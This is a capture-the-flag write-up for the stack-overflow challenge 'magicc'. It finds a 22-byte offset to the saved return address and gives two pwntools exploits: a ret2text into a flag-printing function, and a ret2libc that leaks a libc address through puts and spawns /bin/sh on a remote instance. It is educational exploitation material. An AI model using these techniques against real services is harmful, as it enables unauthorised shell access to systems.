Magic is a relatively basic stack overflow. First, check which protection mechanisms are enabled on the binary.
Running checksec on magicc shows only NX enabled — no stack canary and no PIE. The stack is therefore not executable (so no shellcode on the stack), but a saved return address can still be overwritten and every address inside the binary is fixed, which is why the exploit returns into code that already exists.
Loading the binary in IDA locates the overflow: the read into buf is not bounded by the buffer's size, and the distance from the start of buf to the saved return address is 0x16 (22) bytes. The exploit is therefore 22 bytes of padding followed by the address to return to:
import time
from pwn import *
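# Target process. The page only shows a local run; the same payload applies to
# a remote instance by swapping process() for remote(host, port).
p = process('./magicc')

# Drive the menu to the vulnerable read: option 4, then wait for the
# "success" prompt that precedes the overflowing input.
p.recvuntil('Choose!')
p.sendline('4')
p.recvuntil('success')

# Distance from the start of buf to the saved return address (0x16 = 22 bytes
# per the IDA analysis above). Anything written past it replaces EIP.
OFFSET = 22

# Address of the function in the binary that the author labelled "cat"
# (presumably it prints the flag -- confirm in IDA). NX only blocks stack
# shellcode; with no PIE the .text address is fixed, so returning straight into
# this function (ret2text) is enough. Other addresses the author tried:
# 0x804876e, 0x8048770, 0x80485a7, 0x8048450.
cat = 0x80485AD

# 22 bytes of filler reach the saved EIP, which is then replaced by cat.
payload = 'A' * OFFSET + p32(cat)
p.sendline(payload)
p.interactive()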
Alternatively, instead of returning into a flag-printing function, use ROP: leak a libc address through puts@plt and a GOT entry, compute system and "/bin/sh" from the offsets of the matching libc build, and return into the vulnerable function so the overflow can be triggered a second time.
from pwn import *
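context.log_level = "debug"   # show every send/recv; useful when the leak read is misaligned
context.arch = "i386"         # 32-bit target: p32/u32 and 4-byte stack slots

elf = ELF("magicc")           # local copy of the target, used for PLT/GOT addresses

# Filled in by pwn(): the tube to the target and the libc build used for offsets.
sh = None
lib = None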
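def pwn(ip, port, debug):
    """Leak libc through puts@plt, then return into system("/bin/sh").

    ip, port: remote target, used when debug != 1.
    debug:    1 runs ./magicc locally instead of connecting.
    Sets the module globals sh (the tube) and lib (the libc ELF); on success
    hands the shell to the user via sh.interactive().
    """
    global sh
    global lib
    if debug == 1:
        sh = process("./magicc")
    else:
        sh = remote(ip, port)
    # Every offset below comes from this libc build, so it must be the exact
    # build the target runs; a different build yields a wrong system/"/bin/sh"
    # and the second stage simply crashes.
    lib = ELF("libc6-i386_2.23-0ubuntu10_amd64.so")

    offset = 22                 # bytes from buf to the saved return address
    # Address placed in the return slot after each call so execution re-enters
    # the vulnerable code path (inferred from its use here; confirm in IDA).
    ret_to_vuln = 0x08048490
    # The author also noted a flag-printing function at 0x08048847; this ROP
    # path does not use it.

    # First pass through the menu to reach the overflowing read.
    sh.recv()
    sh.sendline("4")
    sh.recvuntil("You are one step short of success\n")

    # Stage 1: puts(GOT[__libc_start_main]) prints a libc pointer, then
    # "return" into the vulnerable code so the overflow can be used again.
    payload = offset * "a" + p32(elf.plt['puts']) + p32(ret_to_vuln) + p32(elf.got['__libc_start_main'])
    sh.sendline(payload)
    # puts emits the 4-byte pointer first; recvn blocks until all 4 bytes
    # arrive instead of risking a short read into u32.
    __libc_start_main = u32(sh.recvn(4))
    log.success("__libc_start_main: " + hex(__libc_start_main))

    libc = __libc_start_main - lib.symbols['__libc_start_main']
    system = libc + lib.symbols['system']
    binsh = libc + next(lib.search("/bin/sh"))

    # Stage 2: second trip through the menu, then system("/bin/sh").
    # The libc-derived system address is used (the original computed it but
    # then called elf.plt['system']); the binary is not shown to import system,
    # and this keeps system and binsh consistent with the same leaked base.
    sh.sendline("4")
    sh.recv()
    sh.sendline(offset * "a" + p32(system) + p32(ret_to_vuln) + p32(binsh))
    sh.interactive()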
if __name__ == "__main__":
    # Remote CTF instance used in the writeup; debug=0 connects to it rather
    # than spawning ./magicc locally.
    target_host, target_port = "101.71.29.5", 10001
    pwn(target_host, target_port, 0)